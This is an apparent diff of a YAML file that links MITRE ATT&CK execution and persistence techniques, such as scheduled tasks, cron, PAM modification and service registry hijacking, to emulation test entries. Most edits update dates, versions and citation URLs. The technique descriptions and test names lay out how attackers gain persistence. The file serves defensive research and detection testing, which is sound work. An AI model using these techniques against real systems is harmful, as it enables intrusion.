         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -46885,9 +47267,8 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests:
     - name: Execute a Command as a Service
@@ -47104,10 +47485,10 @@ execution:
         elevation_required: true
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -47170,7 +47551,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -47204,8 +47585,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -47214,6 +47595,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -47226,7 +47611,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At.exe Scheduled task
@@ -47247,23 +47631,24 @@ execution:
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -47310,7 +47695,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -47342,8 +47727,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -47357,6 +47742,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -47369,11 +47758,14 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests:
     - name: Scheduled Task Startup Script
@@ -47752,7 +48144,7 @@ persistence:
           schtasks /Delete /TN "#{task_name}" /F
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -47815,7 +48207,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -47880,49 +48271,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -47937,20 +48289,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -48040,7 +48429,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -48128,7 +48516,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests:
     - name: Append malicious start-process cmdlet
@@ -48251,11 +48638,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -48333,7 +48719,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests:
     - name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -48412,7 +48797,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -48435,11 +48820,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -48497,9 +48881,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -48580,7 +48963,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests:
     - name: UEFI Persistence via Wpbbin.exe File Creation
@@ -48601,7 +48983,7 @@ persistence:
         elevation_required: true
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -48620,7 +49002,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -48634,7 +49015,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -48661,8 +49041,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -48693,7 +49073,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests:
     - name: Service Registry Permissions Weakness
@@ -48809,11 +49190,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -48885,9 +49265,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -48903,7 +49283,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests:
     - name: Add a driver
@@ -48973,7 +49352,7 @@ persistence:
         elevation_required: true
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -49048,7 +49427,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests:
     - name: HKLM - Add atomic_test key to launch executable as part of user setup
@@ -49159,7 +49537,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -49183,8 +49561,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -49339,7 +49715,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests:
     - name: Modify Fax service to run PowerShell
@@ -49551,26 +49926,7 @@ persistence:
         elevation_required: true
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -49587,6 +49943,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -49597,9 +49954,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -49607,17 +49968,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
